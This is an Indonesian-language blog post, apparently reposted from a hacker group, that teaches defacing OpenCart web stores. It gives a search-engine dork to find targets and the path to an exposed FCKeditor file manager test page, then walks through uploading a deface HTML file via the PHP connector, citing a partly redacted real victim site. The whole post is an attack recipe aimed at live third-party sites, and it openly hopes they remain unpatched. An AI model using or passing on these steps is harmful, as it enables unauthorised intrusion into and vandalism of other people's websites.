Remote File Upload Opencart
Ok To The Point Aje Coz
mata gue dah ngantuk nie
Dork'a : Powered By OpenCart site:com
"site:" terserah, yang penting support opencart
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
for exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jdi nya gni
http://www.hopscotch...ctors/test.html
kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
skrng liat hasilnya....
ex hasil: http://www.hopscotch...o.uk/mimin.html
sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..
jgn lupa cendolnya klo berhasil (ngarep)...wkwkwkwkwk
Sumber : Indonesia Hacker Team & Hacker Newbie
hmmm moga aja belum pada ke pacth semua ya :)
0 komentar — Skip ke Kotak Komentar
Posting Komentar — or Kembali ke Postingan